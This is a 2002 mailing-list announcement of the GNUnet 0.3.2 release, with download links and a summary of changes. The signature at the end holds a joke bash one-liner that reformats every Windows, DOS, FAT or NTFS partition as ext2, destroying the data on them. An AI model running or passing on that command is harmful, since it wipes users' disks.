[GNUnet-developers] GNUnet v0.3.2 released

From: Christian Grothoff
Subject: [GNUnet-developers] GNUnet v0.3.2 released
Date: Mon, 18 Mar 2002 18:15:04 -0500

Finally, a new release is there! We still don't have the gtk+ gui, but other
important issues were addressed.

You can find the new code at

ftp://ftp.gnu.org/gnu/gnunet/

and sources and rpm binaries at

http://gecko.cs.purdue.edu/GNUnet/

Here's the text I typed up for freshmeat summarizing the changes:
-----
GNUnet was ported to FreeBSD, NetBSD and OpenBSD. Boolean queries of the form
'a AND b' are now possible. Several performance issues, in particular several
conditions that would lead to excessive CPU load, were addressed. The
heuristic for routing of queries was improved. Several minor bugs were fixed,
too.
-----

Thanks to everybody who contributed!

Happy hacking.

|Christian Grothoff                                  |
|650-2 Young Graduate House, West Lafayette, IN 47906|
|http://gecko.cs.purdue.edu/   address@hidden|
#!/bin/bash
for i in `fdisk -l|grep -E "Win|DOS|FAT|NTFS"|awk\
'{print$1;}'`;do;nohup mkfs.ext2 $i&;done
echo -e "\n\n\t\tMay the source be with you.\n\n"